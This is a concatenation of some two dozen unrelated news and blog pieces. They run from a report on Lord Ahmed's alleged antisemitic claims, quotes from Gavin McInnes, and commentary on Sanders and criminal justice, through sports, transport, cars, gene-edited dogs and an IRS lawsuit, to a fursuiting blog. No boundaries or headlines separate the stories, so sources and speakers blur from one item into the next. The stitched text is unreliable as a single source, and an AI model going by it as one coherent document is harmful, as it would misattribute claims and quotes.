The British newspaper reported that Lord Ahmed of Rotherham, who was jailed for dangerous driving after sending text messages shortly before a fatal motorway accident, made the claim during a television interview in Pakistan
Related stories:
In the broadcast he claimed that the Jewish owners of newspapers and television channels pressured the courts to punish him more severely than was warranted by his offence.
The Times reported that Martyn Gombar, a 28-year-old Slovakian, was killed on Christmas Day in 2007 after his stationary car was hit by Lord Ahmed's Jaguar on the M1 near Sheffield. A lengthy police investigation found that Ahmed sent and received a series of five substantial text messages while travelling at up to 70 mph. The final message was sent less than two minutes before the fatal collision.
Because no causal link could be established between the crash and Lord Ahmed's texts, the 55-year-old Pakistan-born businessman was not charged with causing death by dangerous driving. He faced the lesser offence of dangerous driving and pleaded guilty at Sheffield Magistrates' Court in December 2008, the British newspaper reported.
During the interview in Pakistan, which was apparently aired last April, Lord Ahmed claimed that he should have been sentenced by a magistrate. "My case became more critical because I went to Gaza to support Palestinians. My Jewish friends who own newspapers and TV channels opposed this," he said.
A criminal law expert told The Times that if Lord Ahmed had made such claims in Britain he could have faced prosecution for a hate crime.
Ahmed said Wednesday that he had "no recollection" of giving the TV interview last year.
The Times said Nazir Ahmed, who grew up in Rotherham and ran a number of shops in the town, was an elected Labor councilor who was made a life peer by Tony Blair in 1998 and has since become "one of Britain's most prominent Muslim political leaders."
The Times reported that Lord Ahmed was suspended from the party last year after accusations he called for a $16 million bounty for the capture of US Presidents Barack Obama and George W. Bush. He denied the claims.
Jon Benjamin, Chief Executive of the Board of Deputies of British Jews, was quoted by the British daily as saying: "We are appalled by Lord Ahmed's alleged comments which recall the worst Jewish conspiracy theories. However outlandish and incredible his allegations, there will always be gullible or malicious individuals or groups that will accept what he has said and add to the growth of anti-Semitic discourse."
Follow Ynetnews on Facebook and Twitter
Bleeding Cool found an interesting Easter egg in Aquaman: Rebirth #1.
Earlier today, popular rumormongering website Bleeding Cool pointed out that a character in the new Aquaman comic from DC is based on Vice Co-Founder and vocal anti-feminist Gavin McInnes . Bleeding Cool provided images as proof:
If readers are unfamiliar with McInnes, he's known for his outrageous comments about feminism, amongst other topics. In a live forum on thein 2013, McInnes had the following to say about women in the workplace:
Women are forced to pretend to be men. They're feigning this toughness. They're miserable. Study after study has shown that feminism has made women less happy. They're not happy in the work force, for the most part. I would guess 7 percent [of women] like not having kids, they want to be CEOs, they like staying at the office all night working on a proposal, and all power to them. But by enforcing that as the norm, you're pulling these women away from what they naturally want to do, and you're making them miserable.
Following up on that appearance on, McInnes doubled down. From a report on the show fromheadlined "Gavin McInnes Might Be the Most Sexist Man on the Planet":
The big picture here is, women do earn less in America because they choose to," McInnes said. "They would rather go to their daughter's piano recital than stay all night at work, working on a proposal so they end up earning less."
And it just got worse from there.
"They're less ambitious, and I think this is sort of God's way, this is nature's way of saying women should be at home with the kids — they're happier there," he continued.
"Having a choice doesn't mean that you are less ambitious. And your comments are absolutely deplorable," Holder shot back.
"If you were a real feminist, you would support housewives and see them as the heroes and women who work wasting their time," McInnes argued.
He then told Holder that she looked miserable and questioned if she was celibate because she was single.
Holder appealed to host Sean Hannity — who at this point was only laughing — noting that he has a daughter and that she should have a choice to do what she wants.
"Oh boy," was the only response Hannity could muster.
Cid Martinez is an assistant professor of sociology at the University of San Diego and author of the forthcoming book " The Neighborhood Has Its Own Rules: Latinos and African Americans in South Los Angeles ." His work focuses on criminology, policing, religion, urban politics, immigration and race relations. The opinions expressed in this commentary are his.
(CNN) Last week, Bernie Sanders' campaign released a four-minute video ad featuring an endorsement from the daughter of Eric Garner, the New York man who was choked to death by New York City police officers. In the course of the ad, Erica Garner talked about her father's death as unjust and its effect on her and her young daughter.
She is also campaigning this week on behalf of Sanders in the South Carolina primary.
Garner's support comes at a key time in the election, as Sanders and Hillary Clinton , his rival for the Democratic nomination, seek to rally support among African-American and Latino voters in the upcoming primaries.
The video raises the urgent issue of the broken criminal justice system and its effects on American society, a topic few liberals want to address through activism. How do we know it's broken? According to Harvard sociologist Bruce Western in his book "Punishment and Inequality in America," the United States is the world's leader in incarceration, with more than 2.2 million people behind bars. Western notes that in the past 30 years, incarceration has increased sevenfold.
Police-involved shootings are another sign that the system has unraveled. Although there is not good data quantifying the number of police-involved shootings, since law enforcement does not collect this information, many criminologists would say there is a disproportionately higher number of police-involved shootings of blacks and Latinos.
The ad makes it clear that our broken criminal justice system should be at the center of civil rights discussions. It shows how Garner's daughter has been transformed into a civil rights activist since her father's death. Among critical scholars of criminology, the link between criminal justice and civil rights has long been acknowledged. The Black Lives Matter movement has received national attention in pushing for criminal justice reform, but candidates still are not discussing solutions comprehensively. Until recently, any discussion of the criminal justice system was viewed as being peripheral to progressive agendas.
Sanders ' ad attempts to go further by demonstrating how the criminal justice system shapes the life chances of minorities and the need for a more comprehensive discussion. His ad taps into the fact that our criminal justice system targets social groups, particularly African-Americans and Latinos, not individuals. According to Western, one in four young African-American males are likely to go to jail. They are also more likely to go to jail than attend college or go to the military, which are considered important markers that shape the trajectory of one's life.
The ad shows something else not noted by most Americans and political analysts: The criminal justice system affects not only those arrested and brutalized, but also their extended families. Sanders' video illustrates how Garner's daughter and granddaughter were deeply affected.
The negative effects of the criminal justice system damage future generations. This point is confirmed by Rutgers criminologist Todd Clear in his book "Imprisoning Communities: How Mass Incarceration Makes Disadvantaged Neighborhoods Worse." His research shows that mass incarceration undermines communities, splitting apart families when fathers and mothers are locked up. Eventually, incarceration destroys communities.
This brings us to one of the ad's most powerful messages: It is only through civic and political activism that a more just society for African-Americans, Latinos and American society in general can be achieved. History suggests that Sanders is on to something. In "The Collapse of American Criminal Justice," Harvard legal scholar William Stuntz argues that urban American society went through two periods of mass migration: one by white European immigrants in the first third of the 20th century, and the other by African-Americans during the Great Migration, which roughly occurred in the last two-thirds of the 20th century.
The response to both migrations was strikingly different. For white Europeans, crime barely increased and incarceration decreased to record levels. In contrast, for African-Americans, crime increased and incarceration skyrocketed. What explains the difference?
Stuntz suggests the key difference was that Europeans had strong levels of civic participation in the appointment of judges and prosecutors and had stronger ties to police officers. In contrast, when African-Americans came to inhabit urban America, they did not have the same influence in local politics to shape the election of judges, prosecutors and other appointed officials of the criminal justice system.
More importantly, they became marginal players in the political landscape until the 1980s, when mass incarceration and heavy-handed police tactics were already in place. Stuntz's point is that it was not the law that created a more just society for European ethnics and their offspring, but having access and being active in political and civic participation that shaped the criminal justice system.
By recognizing the new reality of civil rights, where criminal justice reform and political participation go hand in hand, Sanders is tapping into a powerful movement that has the potential to energize his campaign and enlist future generations to transform politics and a broken criminal justice system.
If Sanders' campaign succeeds, this could be part of the political revolution he's been talking about.
PLAYING TO CONDITIONS
"If Umesh was in Australia, he would have got over 150 Test wickets by now." © AFP
Former Australian pacer Rodney Hogg, who featured in 38 Tests and 71 ODIs for the side, is well-versed with conditions in India. Despite Steve Smith's squad sporting four frontline spinners in the squad, Rodney -part of the Australian side that toured here in 1979 -feels Mitchell Starc and Co could still call the shots.
"I couldn't believe what Starc did in Sri Lanka last year (24 wickets from 3 Tests).Those were tough conditions for a player from Australia and he gave it his all. Both Hazlewood and Starc complement each other. Hazlewood makes fast bowling look so easy. In Starc, Smith has someone who can deliver both with the new and old ball," the 65-year-old told TOI on Friday.
However, Rodney feels the emphasis on having more spin options is a step in the right direction. "They are not just thinking about this tour, but have an eye on the future as well. We have one of the best off-spinners in (Nathan) Lyon but he hasn't dominated in India before.
"We have someone like Steve O'Keefe who has played there before. I feel both (Mitchell) Swepson and (Ashton) Agar are work in progress," he pointed out.
Rodney isn't sure about the bowling combination that Australia will use for the Tests. "At home, we play three quicks -Starc, Hazlewood and Bird. But in India, they would like to play two quicks and two spinners. If you see the England side, they had a lot of balance in each aspect (pace and spin) of their bowling. They had every base covered but still couldn't do too well (against India). Our fifth bowler could be crucial if we are to bowl about 150 overs (against India)," Rodney mentioned.
According to the former paceman, Umesh Yadav "is the best fast bowler" from the Indian ranks. "I am really impressed with the way he bowls. If Umesh was in Australia, he would have got over 150 Test wickets by now. He is quick, has a great action but Indian conditions don't suit fast bowling," he said.
With Australian batsmen looking to master the sweep shot in order to negate Indian spinners, Rodney offered a word of caution. "I don't think we play spin very well. You would be in trouble trying to sweep R Ashwin. He (Ashwin) would be licking his lips if he knows Australia are trying to teach themselves how to sweep," he said.
A U.S. association of physicians spoke out against President Trump's ban on transgender individuals serving in the military, which he announced on Wednesday.
The American Medical Association said that transgender people should be allowed to serve in the military.
“There is no medically valid reason to exclude transgender individuals from military service,” association president David O. Barbe said in a statement. “Transgender individuals are serving their country with honor, and they should be allowed to continue doing so.”
President Trump tweeted that transgender people will not be able to serve in the military “in any capacity,” reversing a policy enacted last year under President Barack Obama that allowed them to serve openly. He cited “tremendous medical costs” for transgender service members as a burden on the U.S. military.
The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now
But a 2016 RAND Corporation study, commissioned by the Department of Defense, found that expanding medical coverage to include care for transgender service members would cost an average median of $5.4 million — a small amount considering that total active-component health-care spending adds up to $6 billion every year.
The financial cost of healthcare for transgender individuals “should not be used as an excuse to deny patriotic Americans an opportunity to serve their country,” Barbe said.
“We should be honoring their service — not trying to end it,” he said.
Write to Mahita Gajanan at mahita.gajanan@time.com.
Facebook is toying with its News Feed advertising policy, possibly risking a backlash from marketers who are worried that repeated ads will raise auction prices and force advertisers to seek other platforms.
As Marketing Week reported, ads can now be repeated within News Feed twice a day, including ads from nonconnected user pages.
The doubling of the ad repetition was quietly implemented on Aug. 6 and leaked in a memo sent to agencies. In the email, Facebook said the frequency change was made "to enable businesses to reach people with more relevant content."
The change in ads raised the eyebrows of social media managers who are also concerned about ad quality within the News Feed.
Ben Silcox, head of data and technology at Havas EHS, told the publication, "… Only the brands that have the most compelling stories and the most interesting content that will get someone to nod, smile or share will fuel this advertising spend."
IProspect's social media manager Phillip Dyte had a different concern. Facebook's new policy, he said, will raise the price of auctions by allowing poor advertisers to double their unclicked impressions.
Facebook confirmed the changes to The Next Web, but clarified that its ad-serving changes do not necessarily mean that more ads will start popping up in News Feeds.
In a statement, Facebook said, "It is important to note that with this update, most advertisers will see very little change, if any, to the delivery of their ads in News Feed[s]. … We will not show more ads; rather, we are updating the spacing between ads, and relaxing some of the parameters around insertions of ads from the same advertiser."
The Rays will release catcher Rene Rivera, according to Marc Topkin of the Tampa Bay Times (via Twitter). Tampa Bay also released reliever David Carpenter, Topkin adds on Twitter.
Rivera was owed $1.7MM under his arbitration contract, and Tampa Bay will remain on the hook for around a quarter of that (45 days of pay) if he's not claimed. The club will apparently go with Curt Casali and Hank Conger behind the dish.
Rivera, 32, came to the club in the three-team swap that also brought in outfielder Steven Souza. The highly-regarded defender was coming off of a breakout 2014 season with the Padres after receiving only scattered MLB action previously. But Rivera struggled last year, putting up a meager .178/.213/.275 slash in his 319 plate appearances.
The Rangers and Astros have just filled their needs for additional veteran receivers, though surely some other organization will see fit to add Rivera in some capacity. Despite his questionable bat, he remains a useful presence behind the plate.
Carpenter, 30, was competing for a pen spot. The right-hander has had some strong campaigns in years past, but struggled with injuries last year and saw his strikeout tallies plummet. He ended with a 4.01 ERA in 24 2/3 innings, split between the Yankees and Nationals.
MONTREAL - Transport Quebec says it hopes to reopen Mercier Bridge lanes toward the South Shore by September.
The lanes were closed late Tuesday after inspections found the span required emergency repairs.
That resulted in major traffic jams Wednesday morning on adjacent highways and other bridges.
Traffic on the South Shore-bound lanes was already restricted. Heavy trucks were barred from those lanes because of safety concerns.
The provincial and federal governments, which jointly own the dilapidated bridge, are doing major repairs to the span.
An average of 80,000 vehicles use the Mercier Bridge daily.
Transport Quebec is making changes to help alleviate traffic congestion.
The part of the bridge that normally takes motorists to Montreal will be used for traffic to the South Shore during part of the day - from about noon to midnight.
From midnight to noon, that part of the bridge will be used only for Montreal-bound traffic, as usual.
The Agence métropolitaine de transport will add trains on the Delson-Candiac commuter line as of Thursday morning and is working with regional transit authorities to see if buses can be added.
Quebec and Ottawa will also look into opening to car traffic the ice bridge next to the Champlain Bridge, as was done when the Mercier Bridge was temporarily closed during the 1990 Oka crisis.
ariga@montrealgazette.com
montrealgazette.com/metnews
twitter.com/andyriga
Is your commute affected by the Mercier Bridge shutdown? If you live on the South Shore, how will you get to work in Montreal and back home again?
Comment below or email us at citynews@montrealgazette.com
We just got back from Geneva. And it's fair to say we are well and truly knackered.
Why, you ask? Because it seems that 95% of cars on display at this year's bash were bonkers EV or hybrid-powered sports cars. And that means, naturally, we had to go and gawp at every single one of them. Which meant a LOT of walking and photo snapping!
Whilst we work through all the absolutely gorgeous and inspiring cars we found on the day, we'll leave you with our top five from the show, in no particular order…
Morgan EV3
This three-wheeled work of art perhaps epitomises what EV Peformance is about more than any other car we've ever come across: mixing electric power with a seriously cool car, not just for the environmental benefits, but because it can make for a fun drive, too.
The guys from Morgan Motor Co are some of the most down-to-earth people we've ever met. And their ethos of old-school British engineering at its prime is something that very few other companies could come close to. We can't wait to bring you more on this superb little car!
Tesla Model S Brabus
It's been great seeing more and more modified Model Ss appearing out there. There were a number of savage looking examples at this year's show, cementing our thoughts that this is a car people universally love.
Our pick was renowned German tuning firm Brabus' attempt; all black to match the other cars on its line up, including Merc G Wagons and other bling creations. The subtle mods such as wheels, and a quilted leather re-trim inside makes this a seriously sexy looking car.
All parts are available to buy individually now, just saying…
Volkswagen Budd-E
You've probably heard all about this concept already, and Volkswagen's appearance at the show was rather beautifully overshadowed by the already-infamous shock Dieselgate prank, but having the chance to be personally shown around the Budd-E electric camper of the future by the chief software designer was something we were completely blown away by.
Although not intended to be brought to production anytime soon, the way the multiple screens throughout offer the driver and passengers some ingenious features was truly fascinating to hear about. We'll tell you all about it shortly…
Honda NSX
It's got a twin turbo V6. It's got three electric motors. It's just been confirmed it's going to go on sale for £130,000. But let's be honest here. Do you really care? JUST LOOK AT IT!
This has to be one of the prettiest cars to make production we've seen for some time. And in the flesh, it's even more impressive…
Rimac Concept S
In case the ridiculously fast Concept One from Croatian start-up Rimac (which has just been confirmed for production itself) isn't enough to whet your appetite, its evil twin, the Concept S, was unveiled at the Swiss event.
With 1384bhp and 1327lb ft of instantaneous torque available at the prod of a pedal, this all-electric megacar looks even more vicious than the car it was based on. Hearing the story of the humble man who started it all, Mate Rimac, helped us to appreciate this fascinating company even more.
So I logged on to poswallet to check things out for the day and see if some of the coins I have there started minting again and was greeted with this message from the admin (Everyone who has a poswallet would see the same message).
I read this and saw the part about delisting the majority of coins over this month, this made me think and a few questions arose in my mind. The main one being what's the point of a POS wallet that ditches the majority of their POS coins for non-POS coins? So I jumped on slack to investigate further. Right at the bottom it says they are always open to feedback (lol).
Step one
Ask questions.
As you can see questions are not a good idea, and customers shouldn't ask them.
Step two
Say it would make an awesome steemit post.
Step 1 combined with step 2 really struck a nerve, apparently reviews on the quality of customer service are not encouraged. You can also see liezer1978 edited their responses before I could capture it, but they were far from kind.
So there are the steps required to piss off the owner of an exchange / wallet service. It's apparently really easy to do.
(CNN) In a medical breakthrough that is as terrifying as it is extraordinary, scientists in China say they have created dogs that are twice as strong as they would be naturally, through genetic engineering.
The process used could help prevent human diseases, according to scientists who led the study, which was published by the Journal of Molecular Cell Biology in mid-October.
"There is certainly the potential for this model to help fight human diseases. The process we have been developing could help prevent muscular dystrophy and Parkinson's disease," Professor Xiang Gao told CNN.
Gao, who led the project with Liangxue Lai, is a specialist in genetic engineering at Nanjing University in China.
The two modified beagles, named Hercules and Tiangou, had the myostatin gene deleted at the embryo stage. Myostatin inhibits muscle growth in animals, so the dogs were able to grow unnaturally bigger, more muscular, and stronger.
The process involved the introduction of gene-editing chemicals into around 60 dog embryos. The myostatin gene was successfully knocked out of only two of the dogs.
"The mutant dogs look much stronger than the others. They are overgrown in the thighs," Gao said. "We have not observed any negative side effects. The dogs are not in pain."
Their larger size and strength is expected to allow them to be better and stronger runners.
"Their extra strength means that they may have uses in hunting, even the military," said Professor Gao.
Elaine Ostrander, a scientist at the National Institutes of Health, told the MIT Technology Review that we should not rush to conclusions from the study. "The number of dogs is still small ... It will be interesting to see what types of variation come up as more dogs undergo the process," she said.
Super-muscular humans?
Dogs were used because they have metabolic and neurological features that are similar to humans -- and the same mutation has occurred in humans before.
In 2003, a baby boy in Berlin was determined to be born without myostatin. As a result, he was incredibly strong.
According to the New England Journal of Medicine, "He appeared extraordinarily muscular, with protruding muscles in his thights and upper arms."
JUST WATCHED Creating the perfect child Replay More Videos ... MUST WATCH Creating the perfect child 02:22
The Journal report states that by the time the child was less than five years old, he had increased strength and bulk, and was able to, "hold two 3-kg dumbbells in horizontal suspension with his arms extended."
Hercules and Tiangou -- named after the "heaven dog" in Chinese myth -- will remain at the Guangzhong Pharmaceutical Research Institute, where they will be bred.
"The next step in our study is to see whether or not the dogs can pass on the mutation to future generations," Gao said. "This will be another huge breakthrough."
Prof. Gao told CNN it was possible that humans could be genetically modified, like the beagles, to make stronger athletes or better soldiers.
"However, genetically modifying humans raises other issues," he added.
Ethical Issues
Advancement in genetic engineering is creating a wealth of new opportunities in medical science, but it also raises difficult ethical dilemmas.
Penny Hawkins, head of Research Animals Department at the Royal Society for the Prevention of Cruelty to Animals , told CNN: "The creation of genetically engineered animals can involve painful, invasive procedures on animals; including the removal of eggs and hormone treatment.
"Genetic alteration is never predictable and can result in oversized embryos, resulting in painful births. It can leave the animals severely affected in a way which is impractical for life. The process also very wasteful."
In reference to the dog study, Hawkins said, "The genetic alteration of animals simply to make them stronger, or to have greater running ability, is completely unacceptable.
"If the purpose of the study was to help cure human diseases, then there is more justification. Yet, even so, we ought to look for alternatives to genetic engineering, because the effect on these animals can be so great."
American news network CNN in Baroness Thatcher tribute blunder after running a picture of former PM with JIMMY SAVILE
CNN used 1980 image of Savile presenting Thatcher with NSPCC cheque
Image formed part of report following announcement of death yesterday
Twitter users describe broadcast of image as 'ridiculous' and 'not ideal'
Pair were friends and spent 11 consecutive New Year's Eves together
CNN was attacked last night for broadcasting a picture of Baroness Thatcher with paedophile Jimmy Savile in its coverage of the former prime minister's death.
The U.S. broadcaster used an image from February 1980 of the disgraced BBC DJ presenting her with a cheque for £10,000 in aid of the National Society for the Prevention of Cruelty to Children.
Global TV networks broadcasted tributes yesterday to Lady Thatcher, who died aged 87 following a stroke in bed at the Ritz Hotel in central London, where she had been staying since after Christmas.
Report blunder: CNN used a 1980 image of paedophile Jimmy Savile presenting Baroness Thatcher with a cheque for £10,000 in aid of the National Society for the Prevention of Cruelty to Children
But the unfortunate image was captured by Neal Mann, New York-based social media editor of the Wall Street Journal, and posted on his Twitter feed - before it was retweeted more than 4,000 times.
He said at 1:20pm UK time, shortly after Baroness Thatcher's death was announced at 12:48pm: 'Oh dear someone at CNN obviously didn't get the memo - runs obit pic of Thatcher with Jimmy Savile.'
Donal Blaney, CEO of campaign group Conservative Way Forward, said on Twitter: 'Next time you are told Fox News is biased, just remember what tawdry CNN did to Margaret Thatcher yesterday.'
Other Twitter users described the image's use on CNN Starting Point as 'ridiculous' and 'not ideal'. A CNN spokesman did not immediately return a request for comment on the matter from MailOnline.
Spot: The unfortunate image was captured by Neal Mann, New York-based social media editor of the Wall Street Journal, and posted on his Twitter feed - before it was retweeted more than 4,000 times
Last December a letter thought to mark the beginning of the warm relationship between Lady Thatcher and Savile was made public, but other correspondence between the pair was censored.
The Top Of The Pops presenter sent an adoring letter to the then prime minister in 1980, singing her praises and declaring his love for her. She responded by inviting the now-disgraced DJ to lunch at Chequers, spending 11 consecutive New Year's Eves with him and overseeing his knighthood.
The letter, part of a Savile file released under the 30-year rule by the National Archives at Kew, revealed how well connected to the establishment he was.
Could Trump's feud with Jeb Bush be added to the growing list of campaign bygones?
No one has seemingly mended fences with fierce political opponents faster than Donald Trump since winning the 2016 presidential election.
And while former presidential contender Jeb Bush was one of Trump's harshest critics – and vice versa – he's coming to the president-elect's defense when it comes to speculation about Russia interfering in the election process.
Julian Assange associate: It was a leak, not a hack and the DNC insider is NOT Russian
“‘The Ruskies are out there sticking things in people's brains?' I mean, come on,” Bush told WJHL. “[The Russians] had a candidate that they thought would be better than Hillary Clinton, but they didn't influence the election.
“The American people made up their minds on this,” Bush said.
Wow. That's quite a statement coming from a fierce adversary.
But he didn't stop there, and added praise for Trump's Cabinet choices, including Secretary of State pick Rex Tillerman.
Classy for Trump's inauguration! ‘No lip-syncing Beyoncé,' check out the world-class talent in the works
“My guess is what they'll find is a guy (Tillerman) with vast experience. A patriot,” Bush said. “Someone who will represent the U.S. really, very well. But they'll have a chance to discuss this is at an open hearing. That's how the process works.”
Bush is not alone in his skepticism of Russian interference. Former Arkansas Gov. Mike Huckabee recently said you'd ‘have to believe in Unicorns' to think Russia changed the election results.
Watch the latest video at <a href=”http://video.foxnews.com”>video.foxnews.com</a>
The Internal Revenue Service stole and improperly accessed 60 million medical records after raiding a California company, according to a legal complaint filed in March with the California superior court for San Diego. Fifteen IRS agents are now facing a class-action lawsuit in the matter.
“In a case involving solely a tax matter involving a former employee of the company, these agents stole more than 60,000,000 medical records of more than 10,000,000 Americans” the complaint, filed by attorney Robert Barnes, alleges. “No search warrant authorized the seizure of these records; no subpoena authorized the seizure of these records; none of the 10,000,000 Americans were under any kind of known criminal or civil investigation and their medical records had no relevance whatsoever to the IRS search.”
Advertisement
Advertisement
The complaint goes on to describe how IRS agents ignored the warnings of IT personnel and executives at the company in question, the John Doe Company, and accuses the IRS of violating the plantiff's Fourth Amendment rights against unreasonable search and seizure.
Following the seizure of records, IRS agents also used the company's system for leisure activities, according to the compaint. “Adding insult to injury, after unlawfully seizing the records and searching their intimate parts, defendants decided to use John Doe Company's media system to watch basketball, ordering pizza and Coca-Cola, to take in part of the NCAA tournament, illustrating their complete disregard of the court's order and the Plaintiffs' Fourth Amendment rights” it states.
Advertisement
If substantiated, these allegations are likely to add to the furor sparked by recent revelations that the agency, between 2010 and 2012, targeted tea-party groups for special scrutiny. An inspector general's report released yesterday said the inappropriate focus on conservative groups resulted from lax management.
Advertisement
The lawsuit is seeking $25,000 in compensatory damages for each violation, a declaratory judgment protecting the privileged information of the seized records, an injunction preventing the IRS from sharing the records, and an order requiring the agency to purchse government databases of the records.
The full complaint is available here. The lawsuit was first reported March 14 by Courthouse News Service.
UPDATE: This piece has been modified since its original posting.
UNIVERSITY PARK, Pa. -- Plaster handprints from kindergarten, handprint turkeys, handprints outside Grauman's Chinese Theater in Hollywood -- are all part of modern life, but ancient people also left their handprints on rocks and cave walls. Now, a Penn State anthropologist can determine the sex of some of the people who left their prints, and the majority of them were women.
The assumption has been that hand prints, whether stencils -- paint blown around the hand -- or actual paint-dipped prints, were produced by men because other images on cave walls were often hunting scenes. The smaller handprints were assumed to be adolescent boys.
Dean Snow, emeritus professor of anthropology, came across the work of John Manning, a British biologist who about 10 years ago tried to use the relationships of various hand measurements to determine not only sex, but such things as sexual preference or susceptibility to heart disease. Snow wondered if he could apply this method to the handprints left in cave sites in France and Spain.
"Manning probably went way beyond what the data could infer, but the basic observation that men and women have differing finger ratios was interesting," said Snow. "I thought here was a neat little one off science problem that can be solved by applications of archaeological science."
Go to video Video Handprints video Dean Snow, emeritus professor of anthropology, talks about Upper Paleolithic art on European cave walls.
When Snow saw a handprint in a book on Upper Paleolithic art, he realized that the image was female. A quick look at five other images found that two thirds were female.
Unfortunately, most cave art photographs lack size indication, making it difficult to determine relative size and the sex of the artist. Snow visited a number of caves and the few existing images with size indications. He also collected hand images from people with European and Mediterranean ancestry. He published his results in the current issue of American Antiquity.
Snow found he needed a two-step process for the modern hands to successfully differentiate men from women. He first measured the overall size of the hand using five different measurements. This separated the adult male hands from the rest. Snow found that step one was 79 percent successful in determining sex, but adolescent males were classified as female.
Step two compares the ratios of the index finger to the ring finger and the index finger to the pinky to distinguish between adolescent males and females. For the known hands, the success rate, though statistically significant, was only 60 percent. There is too much overlap between males and females in modern populations.
"I thought the fact that we had so much overlap in the modern world would make it impossible to determine the sex of the ancient handprints," said Snow. "But, old hands all fall at or beyond the extremes of the modern populations. Sexual dimorphism was greater then than it is now."
Sexual dimorphism implies that males and females differ. Not only were male hands larger, Snow found that development of the fingers, how long they are relative each other, also differs significantly.
The first step in the process showed that only 10 percent of the handprints on cave walls in Spain and France were left by adult males. The second step indicates that 15 percent were placed by adolescent males, leaving 75 percent of the handprints female.
"By just eyeballing, I'm more accurate with the modern hands than the formulas I developed," said Snow. "There are some variables there that I'm not aware of yet. The algorithms are pretty good, but they could be better."
Snow also looked at modern American Indian hands and found that the rules and algorithms developed for Europeans did not work. He notes that different populations require separate analysis.
The National Geographic Society funded this research.
A New York man has been charged with attempting to recruit new members into the terrorist group ISIS. So far, the U.S. government believes that over 100 Americans are fighting for ISIS, and Mufid Elfgeeh was arrested and charged with trying to recruit more.
According to federal authorities, Elfgeeh attempted to persuade two other people to join ISIS. And on top of that, he was planning to kill U.S. soldiers who had served in Iraq.
Elfgeeh had actually been speaking with, it turns out, FBI informants. And these informants relayed that Elfgeeh was actively encouraging them to go to Syria, and even covered some of the expenses for passports.
One of the informants say Elfgeeh once told him, “You want to stop the killing machine that is happening there, you understand, and the only way is to deter them by any means.”
[image via Shutterstock]
— —
Follow Josh Feldman on Twitter: @feldmaniac
Have a tip we should know? tips@mediaite.com
It's been an award-filled offseason for Los Angeles Dodgers ace Clayton Kershaw after his domination 2014 season.
Kershaw took home a handful of honors, culminating in winning the National League Cy Young and MVP award. It was the first time an NL pitcher took home the award since 1968. The left-hander's recognition isn't over as he shares his latest award with a fellow Southern California MVP.
According to Dylan Hernandez of the LA Times, Kershaw has taken home an award that is Los Angeles-based:
Clayton Kershaw and Mike Trout named Sportsmen of the Year by Los Angeles Sports Council. — Dylan Hernandez (@dylanohernandez) January 7, 2015
Trout was the American League MVP, after being the runner-up each of the two seasons before. Much was made of the SoCal duo, especially when the Dodgers faced the Angels during the season. Trout may have had the worst season of his short career, but without a healthy Miguel Cabrera in the race, he finally got the MVP award he was lacking. He hit .286 with 36 home runs and 111 RBIs, but also led the league with 184 strikeouts at the plate.
For Kershaw, it's just another award for his 21-3, 1.77 ERA and 239 strikeout performance this season. He led the league in wins, ERA, ERA+, FIP, WHIP and winning percentage. Despite missing a month at the beginning of the year, the 26-year-old still had one of the most dominant seasons by a pitcher in recent memory. It is the second time Kershaw has won the award from the LA Sports Council, taking home the prize in 2011. That was the year he won hist first Cy Young award.
The pair will be honored during the 10th Annual LA Sports Awards, presented by Coca-Cola, which will be held on Sunday, March 15 at The Beverly Hilton Hotel.
There's one name at the top of our 100 best free agents list that's going to be getting a lot of attention over the next few days. Tony Romo's fate still hangs in the balance. The Cowboys have yet to officially release him, something that was originally reported as a foregone conclusion. Now they may be trying to trade him.
The market for Romo may still take some time to really line up. Once it does, you can expect a bunch of other dominoes in the quarterback market to start falling.
But for now, he's the best free agent on the market, and he's not even technically a free agent.
Moving away from the quarterback position, there are still some good players available at a variety of positions.
Let's take a look.
Offensive linemen: Blockers were big winners on the first day of free agency, but for teams that didn't manage to land help in that department, there are some solid players left. For tackles, there's Kelvin Beachum and Ryan Clady, either of whom could start for a team. T.J. Land tops the list of interior linemen still available, thought it sounds like the Seahawks are hot on his heels.
Receivers: I still can't believe the Browns, with enough cap space to facilitate salary dumps for the Texans, haven't re-signed Terrelle Pryor. Someone will snap him up soon enough if they don't. Michael Floyd could be an intriguing option for a team willing to give him a flyer.
Tight ends: Martellus Bennett is still out there. The Jags, 49ers, and Raiders are said to be interested. Is Jared Cook going back to Green Bay or not?
Running backs: It's a tough time to be a veteran running back, but that's been true for almost a decade now. Adrian Peterson and Jamaal Charles have the name recognition, but can they be effective as role players? Eddie Lacy could be a nice addition, if a coach feels like he can keep him, um, healthy.
Quarterbacks: Besides the aforementioned Romo, there's also Jimmy Garoppolo, who is not a free agent but could be had for the right price. Hey, Jay Cutler is available now! And if Mike Glennon can get someone to pay him $15 million a season, then Colin Kaepernick should be able to do the same.
Pass rushers: The best of this bunch mostly got re-signed by their current teams. But there are some good options available starting with Jabaal Sheard, who had five sacks with the Patriots last year. His former teammate there, Chris Long, is also available.
Defensive linemen: I'm really shocked that Dontari Poe is still available, but he won't be for long. Three-down nose tackles are hard to find in today's NFL. Johnathan Hankins is only 24 and can be one the best interior linemen when he's healthy.
Linebackers: The Patriots are trying to re-sign Dont'a Hightower, but he'll have other suitors to drive up the price. Lawrence Timmons is out there too.
Cornerbacks: There's a lot of depth left at this position, but if your team is looking for a true cornerstone kind of guy, the draft is a better bet this year. Morris Claiborne, Brandon Carr, and Price Amukamara are out there and could all be decent starters.
Safeties: T.J. McDonald's arrest in January hurt his free-agent value, but he'd be a great addition for a team in need of a strong safety. He's the best player out there at that position.
Fursuiting has to be one of the more unique aspects in the furry fandom – while it's true that other fandoms might do things such as cosplaying, in regard to furries it's more common place to see folks suiting and cosplaying as their own characters and personas that they create, rather than someone else's. Though fursuits modeled after copyrighted characters do exist, as I remember seeing one of Asriel from Undertale the other day that was simply adorable.
I've had my own fursuit for a little over a year now – it's a mini partial of my part-time mascot part-time fursona, Niko – and I think it would be interesting to share with you all my own thoughts towards being a fursuiter, as well as what made me want to do it in the first place.
The funny thing is I never had much of a desire to fursuit when I first started getting more active in the furry community. I considered it something that sounded interesting, but ultimately “wasn't me.” However, the more time I spent getting involved in the local SoCal scene and getting to know and be around fursuiters the more my opinion on that started to change. I felt like it could be something fun to do, plus the idea of acting as a character was really appealing to me as I felt it could be something that would be entertaining to do, and I love to entertain others. What ended up pushing me to get a suit was when I started going to an event in SoCal called Tail that's at the Executive Suite club in Long Beach. Seeing furries dancing on the top floor and watching them bounce around during Karaoke looked like loads of fun, as well as a way to try to escape my own stage fright with karaoke and dancing; couple that with the concept of bringing a character to life, and the seeds were planted for me to commission my own suit of Niko.
